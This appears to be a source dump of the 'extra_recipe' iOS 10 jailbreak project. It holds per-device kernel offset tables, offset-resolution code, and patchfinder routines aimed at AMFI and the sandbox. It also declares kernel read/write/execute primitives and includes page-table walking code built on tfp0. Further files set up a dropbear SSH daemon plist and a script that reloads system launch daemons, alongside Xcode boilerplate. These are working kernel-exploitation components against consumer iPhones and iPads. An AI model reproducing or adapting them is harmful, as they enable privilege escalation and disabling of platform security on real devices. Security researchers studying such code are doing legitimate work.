8 | iPhone9,1 9 | iPhone9,2 10 | iPhone9,3 11 | iPhone9,4 12 | 13 | ios 14 | 15 | 10.1 16 | 10.1.1 17 | 18 | nports 19 | 40000 20 | offsets 21 | 22 | 23 | 0xfffffff006f83d38 24 | 25 | 0xfffffff00747ad9c 26 | 27 | 0xfffffff0074916b4 28 | 29 | 0xfffffff00749ca6c 30 | 31 | 0xfffffff0075f0178 32 | 33 | 0xfffffff00757c898 34 | 35 | 0xfffffff006337e10 36 | 37 | 38 | 39 | hw 40 | 41 | iPhone9,1 42 | iPhone9,2 43 | iPhone9,3 44 | iPhone9,4 45 | 46 | ios 47 | 48 | 10.0.1 49 | 10.0.2 50 | 10.0.3 51 | 52 | nports 53 | 40000 54 | offsets 55 | 56 | 0xfffffff006f83b78 57 | 0xfffffff007479938 58 | 0xfffffff007490240 59 | 0xfffffff00749b5f8 60 | 0xfffffff0075f0178 61 | 0xfffffff00757c898 62 | 0xfffffff00633fe10 63 | 64 | 65 | 66 | hw 67 | 68 | iPhone7,2 69 | 70 | ios 71 | 72 | 10.2 73 | 74 | nports 75 | 15000 76 | offsets 77 | 78 | 0xfffffff006f9b450 79 | 0xfffffff0074446dc 80 | 0xfffffff00745b0dc 81 | 0xfffffff0074664f8 82 | 0xfffffff0075bc468 83 | 0xfffffff007548a98 84 | 0xfffffff006413e10 85 | 86 | 87 | 88 | hw 89 | 90 | iPad4,7 91 | 92 | ios 93 | 94 | 10.2 95 | 96 | nports 97 | 40000 98 | offsets 99 | 100 | 0xfffffff006fafa10 101 | 0xfffffff00743844c 102 | 0xfffffff00744ee4c 103 | 0xfffffff00745a268 104 | 0xfffffff0075b0418 105 | 0xfffffff00753ca98 106 | 0xfffffff00641be10 107 | 108 | 109 | 110 | hw 111 | 112 | iPad5,3 113 | iPad5,4 114 | 115 | ios 116 | 117 | 10.2 118 | 119 | nports 120 | 40000 121 | offsets 122 | 123 | 0xfffffff006f85310 124 | 0xfffffff007444900 125 | 0xfffffff00745b300 126 | 0xfffffff00746671c 127 | 0xfffffff0075bc528 128 | 0xfffffff007548a98 129 | 0xfffffff0063bfe10 130 | 131 | 132 | 133 | hw 134 | 135 | iPhone8,1 136 | iPhone8,2 137 | 138 | ios 139 | 140 | 10.2 141 | 142 | nports 143 | 40000 144 | offsets 145 | 146 | 0xfffffff006f9b950 147 | 0xfffffff00743755c 148 | 0xfffffff00744df5c 149 | 0xfffffff007459378 150 | 0xfffffff0075ac438 151 | 0xfffffff007538a98 152 | 0xfffffff0063cfe10 153 | 154 | 155 | 156 | 157 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/dropbear.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Label 6 | ShaiHulud 7 | Program 8 | /usr/local/bin/dropbear 9 | ProgramArguments 10 | 11 | /usr/local/bin/dropbear 12 | -F 13 | -R 14 | -p 15 | 127.0.0.1:22 16 | 17 | RunAtLoad 18 | 19 | KeepAlive 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/extra_recipe-Bridging-Header.h: -------------------------------------------------------------------------------- 1 | // 2 | // Use this file to import your target's public headers that you would like to expose to Swift. 3 | // 4 | 5 | int jb_go(); 6 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe/launchctl -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/load_regs_and_crash.s: -------------------------------------------------------------------------------- 1 | .text 2 | .globl _load_regs_and_crash 3 | .align 2 4 | _load_regs_and_crash: 5 | mov x30, x0 6 | ldp x0, x1, [x30, 0] 7 | ldp x2, x3, [x30, 0x10] 8 | ldp x4, x5, [x30, 0x20] 9 | ldp x6, x7, [x30, 0x30] 10 | ldp x8, x9, [x30, 0x40] 11 | ldp x10, x11, [x30, 0x50] 12 | ldp x12, x13, [x30, 0x60] 13 | ldp x14, x15, [x30, 0x70] 14 | ldp x16, x17, [x30, 0x80] 15 | ldp x18, x19, [x30, 0x90] 16 | ldp x20, x21, [x30, 0xa0] 17 | ldp x22, x23, [x30, 0xb0] 18 | ldp x24, x25, [x30, 0xc0] 19 | ldp x26, x27, [x30, 0xd0] 20 | ldp x28, x29, [x30, 0xe0] 21 | brk 0 22 | .align 3 23 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/mach-portal.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe/mach-portal.dylib -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/mach_portal.dylib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe/mach_portal.dylib -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/offsets.h: -------------------------------------------------------------------------------- 1 | // 2 | // offsets.h 3 | // extra_recipe 4 | // 5 | // Created by xerub on 28/05/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 7 | // 8 | 9 | #ifndef offsets_h 10 | #define offsets_h 11 | 12 | enum { 13 | ERR_NOERR = 0, 14 | ERR_INTERNAL = 1, 15 | ERR_UNSUPPORTED = 2, 16 | ERR_UNSUPPORTED_YET = 3, 17 | }; 18 | 19 | extern unsigned offsetof_p_pid; 20 | extern unsigned offsetof_task; 21 | extern unsigned offsetof_p_ucred; 22 | extern unsigned offsetof_p_csflags; 23 | extern unsigned offsetof_itk_self; 24 | extern unsigned offsetof_itk_sself; 25 | extern unsigned offsetof_itk_bootstrap; 26 | extern unsigned offsetof_ip_mscount; 27 | extern unsigned offsetof_ip_srights; 28 | extern unsigned offsetof_special; 29 | 30 | extern const char *mp; 31 | 32 | extern uint64_t AGXCommandQueue_vtable; 33 | extern uint64_t OSData_getMetaClass; // +8 == ret 34 | extern uint64_t OSSerializer_serialize; 35 | extern uint64_t k_uuid_copy; 36 | 37 | extern uint64_t allproc; 38 | extern uint64_t realhost; 39 | extern uint64_t call5; 40 | 41 | extern int nports; 42 | 43 | int init_offsets(void); 44 | uint64_t constget(int idx); 45 | 46 | #endif /* offsets_h */ 47 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/offsets.m: -------------------------------------------------------------------------------- 1 | // 2 | // offsets.m 3 | // extra_recipe 4 | // 5 | // Created by xerub on 28/05/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 7 | // 8 | 9 | #include 10 | #include 11 | 12 | #include "offsets.h" 13 | 14 | unsigned offsetof_p_pid = 0x10; // proc_t::p_pid 15 | unsigned offsetof_task = 0x18; // proc_t::task 16 | unsigned offsetof_p_ucred = 0x100; // proc_t::p_ucred 17 | unsigned offsetof_p_csflags = 0x2a8; // proc_t::p_csflags 18 | unsigned offsetof_itk_self = 0xD8; // task_t::itk_self (convert_task_to_port) 19 | unsigned offsetof_itk_sself = 0xE8; // task_t::itk_sself (task_get_special_port) 20 | unsigned offsetof_itk_bootstrap = 0x2b8; // task_t::itk_bootstrap (task_get_special_port) 21 | unsigned offsetof_ip_mscount = 0x9C; // ipc_port_t::ip_mscount (ipc_port_make_send) 22 | unsigned offsetof_ip_srights = 0xA0; // ipc_port_t::ip_srights (ipc_port_make_send) 23 | unsigned offsetof_special = 2 * sizeof(long); // host::special 24 | 25 | const char *mp = NULL; 26 | 27 | uint64_t AGXCommandQueue_vtable = 0; 28 | uint64_t OSData_getMetaClass = 0; 29 | uint64_t OSSerializer_serialize = 0; 30 | uint64_t k_uuid_copy = 0; 31 | 32 | uint64_t allproc = 0; 33 | uint64_t realhost = 0; 34 | uint64_t call5 = 0; 35 | 36 | int nports = 40000; 37 | 38 | static NSMutableArray *consttable = nil; 39 | static NSMutableArray *collide = nil; 40 | 41 | static int 42 | constload(void) 43 | { 44 | struct utsname uts; 45 | uname(&uts); 46 | if (strstr(uts.version, "Marijuan")) { 47 | return -2; 48 | } 49 | 50 | NSString *strv = [NSString stringWithUTF8String:uts.version]; 51 | NSArray *dp =[[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"def" ofType:@"plist"]]; 52 | int m = 0; 53 | collide = [NSMutableArray new]; 54 | 55 | for (NSDictionary *dict in dp) { 56 | if ([dict[@"vers"] isEqualToString:strv]) { 57 | [collide setObject:[NSMutableArray new] atIndexedSubscript:m]; 58 | int i = 0; 59 | for (NSString *str in dict[@"val"]) { 60 | [collide[m] setObject:[NSNumber numberWithUnsignedLongLong:strtoull([str UTF8String], 0, 0)] atIndexedSubscript:i]; 61 | i++; 62 | } 63 | m++; 64 | } 65 | } 66 | if (m) { 67 | return 0; 68 | } 69 | return -1; 70 | } 71 | 72 | static char 73 | affine_const_by_surfacevt(uint64_t surfacevt_slid) 74 | { 75 | for (NSArray *arr in collide) { 76 | if ((surfacevt_slid & 0xfffff) == ([[arr objectAtIndex:1] unsignedLongLongValue] & 0xfffff)) { 77 | NSLog(@"affined"); 78 | consttable = arr; 79 | return 0; 80 | } 81 | } 82 | return -1; 83 | } 84 | 85 | uint64_t 86 | constget(int idx) 87 | { 88 | return [[consttable objectAtIndex:idx] unsignedLongLongValue]; 89 | } 90 | 91 | static int 92 | offload(const char *hw, NSString *ios) 93 | { 94 | NSArray *dp = [[NSArray alloc] initWithContentsOfFile: [[NSBundle mainBundle] pathForResource: @"dex" ofType:@"plist"]]; 95 | for (NSDictionary *dict in dp) { 96 | NSArray *hw_array = dict[@"hw"]; 97 | for (NSString *h in hw_array) { 98 | if (!strcmp([h UTF8String], hw)) { 99 | NSArray *ios_array = dict[@"ios"]; 100 | for (NSString *i in ios_array) { 101 | if ([ios compare:i] == NSOrderedSame) { 102 | NSArray *a = dict[@"offsets"]; 103 | AGXCommandQueue_vtable = strtoull([[a objectAtIndex:0] UTF8String], NULL, 0); 104 | OSData_getMetaClass = strtoull([[a objectAtIndex:1] UTF8String], NULL, 0); 105 | OSSerializer_serialize = strtoull([[a objectAtIndex:2] UTF8String], NULL, 0); 106 | k_uuid_copy = strtoull([[a objectAtIndex:3] UTF8String], NULL, 0); 107 | allproc = strtoull([[a objectAtIndex:4] UTF8String], NULL, 0); 108 | realhost = strtoull([[a objectAtIndex:5] UTF8String], NULL, 0); 109 | call5 = strtoull([[a objectAtIndex:6] UTF8String], NULL, 0); 110 | nports = [dict[@"nports"] intValue]; 111 | return 0; 112 | } 113 | } 114 | } 115 | } 116 | } 117 | return -1; 118 | } 119 | 120 | int 121 | init_offsets(void) 122 | { 123 | struct utsname uts; 124 | 125 | if (uname(&uts)) { 126 | return ERR_INTERNAL; 127 | } 128 | 129 | NSString *version = [[UIDevice currentDevice] systemVersion]; 130 | if ([version compare:@"10.0" options:NSNumericSearch] == NSOrderedAscending || 131 | [version compare:@"10.2" options:NSNumericSearch] == NSOrderedDescending) { 132 | return ERR_UNSUPPORTED; 133 | } 134 | 135 | if (!strncmp(uts.machine, "iPhone9,", sizeof("iPhone9"))) { 136 | // iPhone 7 (plus) 137 | if (constload() || affine_const_by_surfacevt(0xfffffff006e521e0)) { 138 | return ERR_INTERNAL; 139 | } 140 | if ([version compare:@"10.1" options:NSNumericSearch] == NSOrderedAscending) { 141 | // 10.0[.x] 142 | mp = "@executable_path/mach-portal.dylib"; 143 | } else { 144 | // 10.1[.x] 145 | mp = "@executable_path/mach_portal.dylib"; 146 | } 147 | } 148 | 149 | if (offload(uts.machine, version) || !AGXCommandQueue_vtable) { 150 | return ERR_UNSUPPORTED_YET; 151 | } 152 | 153 | return 0; 154 | } 155 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/patchfinder64.h: -------------------------------------------------------------------------------- 1 | #ifndef PATCHFINDER64_H_ 2 | #define PATCHFINDER64_H_ 3 | 4 | int init_kernel(uint64_t base, const char *filename); 5 | void term_kernel(void); 6 | 7 | enum { SearchInCore, SearchInPrelink }; 8 | 9 | uint64_t find_register_value(uint64_t where, int reg); 10 | uint64_t find_reference(uint64_t to, int n, int prelink); 11 | uint64_t find_strref(const char *string, int n, int prelink); 12 | uint64_t find_gPhysBase(void); 13 | uint64_t find_kernel_pmap(void); 14 | uint64_t find_amfiret(void); 15 | uint64_t find_ret_0(void); 16 | uint64_t find_amfi_memcmpstub(void); 17 | uint64_t find_sbops(void); 18 | uint64_t find_lwvm_mapio_patch(void); 19 | uint64_t find_lwvm_mapio_newj(void); 20 | 21 | uint64_t find_entry(void); 22 | const unsigned char *find_mh(void); 23 | 24 | uint64_t find_cpacr_write(void); 25 | uint64_t find_str(const char *string); 26 | uint64_t find_amfiops(void); 27 | uint64_t find_sysbootnonce(void); 28 | 29 | #endif 30 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/pte_stuff.h: -------------------------------------------------------------------------------- 1 | #ifndef pte_stuff_h 2 | #define pte_stuff_h 3 | 4 | 5 | #define TTE_INDEX_SHIFT 3 6 | #define TTE_SIZE (1 << TTE_INDEX_SHIFT) 7 | #define TTE_INDEX(vma, level) ((vma.vm_info.level ## _index) << TTE_INDEX_SHIFT) 8 | #define TTE_GET(tte, mask) (tte & mask) 9 | #define TTE_SETB(tte, mask) tte = tte | mask 10 | #define TTE_SET(tte, mask, val) tte = ((tte & (~mask)) | (val & mask)) 11 | #define TTE_IS_VALID_MASK 0x1 12 | #define TTE_IS_TABLE_MASK 0x2 13 | #define TTE_BLOCK_ATTR_INDEX_MASK 0x1C 14 | #define TTE_BLOCK_ATTR_NS_MASK 0x20 15 | #define TTE_BLOCK_ATTR_AP_MASK 0xC0 16 | #define TTE_BLOCK_ATTR_AP_RO_MASK 0x80 17 | #define TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK 0x40 18 | #define TTE_BLOCK_ATTR_SH_MASK 0x300 19 | #define TTE_BLOCK_ATTR_AF_MASK 0x400 20 | #define TTE_BLOCK_ATTR_NG_MASK 0x800 21 | #define TTE_PHYS_VALUE_MASK 0xFFFFFFFFF000ULL 22 | #define TTE_BLOCK_ATTR_CONTIG_MASK (1ULL << 52) 23 | #define TTE_BLOCK_ATTR_PXN_MASK (1ULL << 53) 24 | #define TTE_BLOCK_ATTR_UXN_MASK (1ULL << 54) 25 | #define VIRT_TO_PHYS(vaddr) (vaddr - gVirtBase + gPhysBase) 26 | #define PHYS_TO_VIRT(paddr) (paddr - gPhysBase + gVirtBase) 27 | uint64_t gPhysBase,gVirtBase,pmap_store,level1_table,hibit_guess; 28 | 29 | typedef union VMA_4K { 30 | struct { 31 | uint64_t block_off : 12; 32 | uint64_t level3_index : 9; 33 | uint64_t level2_index : 9; 34 | uint64_t level1_index : 9; 35 | uint64_t level0_index : 9; 36 | uint64_t ttbr_selector : 16; 37 | } __attribute__((packed)) vm_info; 38 | uint64_t vmaddr; 39 | } VMA_4K; 40 | typedef union VMA_16K { 41 | struct { 42 | uint64_t block_off : 14; 43 | uint64_t level3_index : 11; 44 | uint64_t level2_index : 11; 45 | uint64_t level1_index : 11; 46 | uint64_t level0_index : 1; 47 | uint64_t ttbr_selector : 16; 48 | } __attribute__((packed)) vm_info; 49 | uint64_t vmaddr; 50 | } VMA_16K; 51 | 52 | VMA_16K vad16; 53 | VMA_4K vad4; 54 | char isvad = 0; 55 | 56 | #define TTELog NSLog 57 | vm_size_t sz = 0; 58 | 59 | void checkvad() { 60 | if (!sz) { 61 | struct utsname u = { 0 }; 62 | uname(&u); 63 | host_page_size(mach_host_self(), &sz); 64 | NSLog(@"checkvad: %x %x", sz, getpagesize()); 65 | if (strstr(u.machine, "iPad5,") == u.machine) { 66 | sz = 4096; // this is 4k but host_page_size lies to us 67 | } 68 | assert(sz); 69 | if (sz == 4096) { 70 | isvad = 1; 71 | } 72 | } 73 | } 74 | void parse_block_tte(uint64_t tte) { 75 | TTELog(@"TTE physaddr: %016llx", TTE_GET(tte, TTE_PHYS_VALUE_MASK)); 76 | TTELog(@"TTE table: %d", !!(TTE_GET(tte, TTE_IS_TABLE_MASK))); 77 | TTELog(@"TTE valid: %d", !!(TTE_GET(tte, TTE_IS_VALID_MASK))); 78 | TTELog(@"TTE userland eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_UXN_MASK))); 79 | TTELog(@"TTE privileged eXecute Never: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_PXN_MASK))); 80 | TTELog(@"TTE contiguous: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_CONTIG_MASK))); 81 | TTELog(@"TTE not global: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_NG_MASK))); 82 | TTELog(@"TTE access flag: %d", !!(TTE_GET(tte, TTE_BLOCK_ATTR_AF_MASK))); 83 | TTELog(@"TTE shareable: %01llx", (TTE_GET(tte, TTE_BLOCK_ATTR_SH_MASK) >> 8)); 84 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_RO_MASK)) ? "Read only" : "Read/Write"); 85 | TTELog(@"TTE access permissions: %s", (TTE_GET(tte, TTE_BLOCK_ATTR_AP_CAN_EL0_ACCESS_MASK)) ? "EL0 (Userland) can access this page" : "EL0 (Userland) cannot access this page"); 86 | } 87 | 88 | void pagestuff_64(vm_address_t vmaddr, void (^pagestuff_64_callback)(vm_address_t tte_addr, int addr), vm_address_t table, int level) { 89 | 90 | checkvad(); 91 | if (!table) table = level1_table; 92 | if (!level) level = 1; 93 | 94 | vm_address_t tteaddr = 0; 95 | 96 | 97 | 98 | if (sz == 4096) { 99 | VMA_4K target_addr; 100 | target_addr.vmaddr = vmaddr; 101 | 102 | if (level == 1) { 103 | target_addr.vm_info.level1_index -= 0x1c0; 104 | } 105 | 106 | switch (level) { 107 | case 0: 108 | tteaddr = table + TTE_INDEX(target_addr, level0); 109 | break; 110 | case 1: 111 | tteaddr = table + TTE_INDEX(target_addr, level1); 112 | break; 113 | 114 | case 2: 115 | tteaddr = table + TTE_INDEX(target_addr, level2); 116 | break; 117 | 118 | case 3: 119 | tteaddr = table + TTE_INDEX(target_addr, level3); 120 | break; 121 | 122 | default: 123 | break; 124 | } 125 | 126 | } else if (sz == 4096*4) { 127 | VMA_16K target_addr; 128 | target_addr.vmaddr = vmaddr; 129 | 130 | switch (level) { 131 | case 0: 132 | tteaddr = table + TTE_INDEX(target_addr, level0); 133 | break; 134 | case 1: 135 | tteaddr = table + TTE_INDEX(target_addr, level1); 136 | break; 137 | 138 | case 2: 139 | tteaddr = table + TTE_INDEX(target_addr, level2); 140 | break; 141 | 142 | case 3: 143 | tteaddr = table + TTE_INDEX(target_addr, level3); 144 | break; 145 | 146 | default: 147 | break; 148 | } 149 | 150 | 151 | } 152 | 153 | //parse_block_tte(level1_entry); 154 | 155 | pagestuff_64_callback(tteaddr, level); 156 | 157 | uint64_t level1_entry = ReadAnywhere64(tteaddr); 158 | 159 | if (TTE_GET(level1_entry, TTE_IS_TABLE_MASK) && level != 3) { 160 | pagestuff_64(vmaddr, pagestuff_64_callback, (TTE_GET(level1_entry, TTE_PHYS_VALUE_MASK)) - gPhysBase + gVirtBase, level + 1); 161 | } 162 | } 163 | 164 | uint64_t findphys_real(uint64_t virtaddr) { 165 | __block uint64_t physvar = 0; 166 | pagestuff_64(virtaddr, ^(vm_address_t tte_addr, int addr) { 167 | uint64_t tte = ReadAnywhere64(tte_addr); 168 | if (addr == 3) {\ 169 | physvar = TTE_GET(tte, TTE_PHYS_VALUE_MASK); 170 | } 171 | }, level1_table, isvad ? 1 : 2); 172 | 173 | return physvar; 174 | 175 | } 176 | uint64_t physalloc(uint64_t size) { 177 | uint64_t ret = 0; 178 | mach_vm_allocate(tfp0, (mach_vm_address_t*) &ret, size, VM_FLAGS_ANYWHERE); 179 | return ret; 180 | } 181 | 182 | #endif 183 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/reload: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ls /etc/rc.d | while read a; do /etc/rc.d/$a; done 3 | sleep 1 4 | launchctl unload $(ls /System/Library/LaunchDaemons/ | grep -v logd | grep -v fud | grep -v ReportCrash | while read a; do printf /System/Library/LaunchDaemons/$a\ ; done) 5 | launchctl unload /System/Library/NanoLaunchDaemons 6 | sleep 1 7 | launchctl load /Library/LaunchDaemons 8 | launchctl load /System/Library/LaunchDaemons 9 | launchctl load /System/Library/NanoLaunchDaemons 10 | 11 | exit 0 12 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-cydia/extra_recipe/tar -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-cydia/extra_recipe/unjail.h: -------------------------------------------------------------------------------- 1 | // 2 | // unjail.h 3 | // extra_recipe 4 | // 5 | // Created by xerub on 16/05/2017. 6 | // Copyright © 2017 xerub. All rights reserved. 7 | // 8 | 9 | #ifndef unjail_h 10 | #define unjail_h 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | #include 20 | #include 21 | #include 22 | #include 23 | 24 | extern mach_port_t tfp0; 25 | extern uint64_t kaslr_shift; 26 | extern uint64_t kernel_base; 27 | 28 | vm_size_t kread(vm_address_t where, uint8_t *p, vm_size_t size); 29 | uint64_t kread_uint64(vm_address_t where); 30 | uint32_t kread_uint32(vm_address_t where); 31 | vm_size_t kwrite(vm_address_t where, const uint8_t *p, vm_size_t size); 32 | vm_size_t kwrite_uint64(vm_address_t where, uint64_t value); 33 | vm_size_t kwrite_uint32(vm_address_t where, uint32_t value); 34 | 35 | void kx2(uint64_t fptr, uint64_t arg1, uint64_t arg2); 36 | uint32_t kx5(uint64_t fptr, uint64_t arg1, uint64_t arg2, uint64_t arg3, uint64_t arg4, uint64_t arg5); 37 | 38 | #endif /* unjail_h */ 39 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/README.md: -------------------------------------------------------------------------------- 1 | A jailbreak. 2 | 3 | ##### Howto: 4 | 5 | Clean reboot the device, wait for a couple of minutes, start extra_recipe, wait for 5 seconds or so, then hit "go". 6 | If it says "failed, reboot" you should really reboot. Re-trying the same app will most likely encounter a kernel panic somewhere down the road. 7 | 8 | ##### Support: 9 | 10 | | Device | Version | 11 | |---------|----------| 12 | | iPhone 7/+ | iOS 10.0.1 -> iOS 10.1.1 | 13 | | iPhone 6S/+ (TSMC) | iOS 10.2 | 14 | | iPhone SE (TSMC) | iOS 10.2 | 15 | | iPhone 6/+ | iOS 10.1.1 & 10.2 | 16 | | iPhone 5S | iOS 10.0.2, 10.1.1 & 10.2 | 17 | | iPad Air 2 | iOS 10.2 | 18 | | iPad Pro 9.7 | iOS 10.2 | 19 | | iPad Pro 12.9 | iOS 10.2 | 20 | | iPad Air | iOS 10.2 | 21 | | iPad Mini 2 | iOS 10.0.2 & 10.2 | 22 | | iPad Mini 3 | iOS 10.2 | 23 | | iPad Mini 4 | iOS 10.2 | 24 | | iPod Touch 6th Gen. | iOS 10.2 | 25 | 26 | ##### Credits: 27 | 28 | * Ian Beer for the amazingly simple, yet awesome, kernel exploit 29 | * @qwertyoruiop for the amazingly complicated, yet effective, memprot bypass 30 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe.xcodeproj/project.xcworkspace/contents.xcworkspacedata: -------------------------------------------------------------------------------- 1 | 2 | 4 | 6 | 7 | 8 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/externalist/exploit_playground/787d50ee0ccb57c4207c2b41072486c081fef733/extra_recipe/extra_recipe-master/extra_recipe.xcodeproj/project.xcworkspace/xcuserdata/ianbeer.xcuserdatad/UserInterfaceState.xcuserstate -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/extra_recipe.xcscheme: -------------------------------------------------------------------------------- 1 | 2 | 5 | 8 | 9 | 15 | 21 | 22 | 23 | 24 | 25 | 30 | 31 | 32 | 33 | 39 | 40 | 41 | 42 | 43 | 44 | 54 | 56 | 62 | 63 | 64 | 65 | 66 | 67 | 73 | 75 | 81 | 82 | 83 | 84 | 86 | 87 | 90 | 91 | 92 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe.xcodeproj/xcuserdata/ianbeer.xcuserdatad/xcschemes/xcschememanagement.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | SchemeUserState 6 | 7 | extra_recipe.xcscheme 8 | 9 | orderHint 10 | 0 11 | 12 | 13 | SuppressBuildableAutocreation 14 | 15 | B0F37BBC1E361EAD00179E85 16 | 17 | primary 18 | 19 | 20 | 21 | 22 | 23 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/AppDelegate.swift: -------------------------------------------------------------------------------- 1 | // 2 | // AppDelegate.swift 3 | // extra_recipe 4 | // 5 | // Created by Ian Beer on 1/23/17. 6 | // Copyright © 2017 Ian Beer. All rights reserved. 7 | // 8 | 9 | import UIKit 10 | 11 | @UIApplicationMain 12 | class AppDelegate: UIResponder, UIApplicationDelegate { 13 | 14 | var window: UIWindow? 15 | 16 | 17 | func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplicationLaunchOptionsKey: Any]?) -> Bool { 18 | // Override point for customization after application launch. 19 | return true 20 | } 21 | 22 | func applicationWillResignActive(_ application: UIApplication) { 23 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state. 24 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game. 25 | } 26 | 27 | func applicationDidEnterBackground(_ application: UIApplication) { 28 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later. 29 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits. 30 | } 31 | 32 | func applicationWillEnterForeground(_ application: UIApplication) { 33 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background. 34 | } 35 | 36 | func applicationDidBecomeActive(_ application: UIApplication) { 37 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface. 38 | } 39 | 40 | func applicationWillTerminate(_ application: UIApplication) { 41 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:. 42 | } 43 | 44 | 45 | } 46 | 47 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/Assets.xcassets/AppIcon.appiconset/Contents.json: -------------------------------------------------------------------------------- 1 | { 2 | "images" : [ 3 | { 4 | "idiom" : "iphone", 5 | "size" : "29x29", 6 | "scale" : "2x" 7 | }, 8 | { 9 | "idiom" : "iphone", 10 | "size" : "29x29", 11 | "scale" : "3x" 12 | }, 13 | { 14 | "idiom" : "iphone", 15 | "size" : "40x40", 16 | "scale" : "2x" 17 | }, 18 | { 19 | "idiom" : "iphone", 20 | "size" : "40x40", 21 | "scale" : "3x" 22 | }, 23 | { 24 | "idiom" : "iphone", 25 | "size" : "60x60", 26 | "scale" : "2x" 27 | }, 28 | { 29 | "idiom" : "iphone", 30 | "size" : "60x60", 31 | "scale" : "3x" 32 | }, 33 | { 34 | "idiom" : "ipad", 35 | "size" : "29x29", 36 | "scale" : "1x" 37 | }, 38 | { 39 | "idiom" : "ipad", 40 | "size" : "29x29", 41 | "scale" : "2x" 42 | }, 43 | { 44 | "idiom" : "ipad", 45 | "size" : "40x40", 46 | "scale" : "1x" 47 | }, 48 | { 49 | "idiom" : "ipad", 50 | "size" : "40x40", 51 | "scale" : "2x" 52 | }, 53 | { 54 | "idiom" : "ipad", 55 | "size" : "76x76", 56 | "scale" : "1x" 57 | }, 58 | { 59 | "idiom" : "ipad", 60 | "size" : "76x76", 61 | "scale" : "2x" 62 | } 63 | ], 64 | "info" : { 65 | "version" : 1, 66 | "author" : "xcode" 67 | } 68 | } -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/Base.lproj/LaunchScreen.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/Base.lproj/Main.storyboard: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 29 | 37 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | -------------------------------------------------------------------------------- /extra_recipe/extra_recipe-master/extra_recipe/Info.plist: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | CFBundleDevelopmentRegion 6 | en 7 | CFBundleExecutable 8 | $(EXECUTABLE_NAME) 9 | CFBundleIdentifier 10 | $(PRODUCT_BUNDLE_IDENTIFIER) 11 | 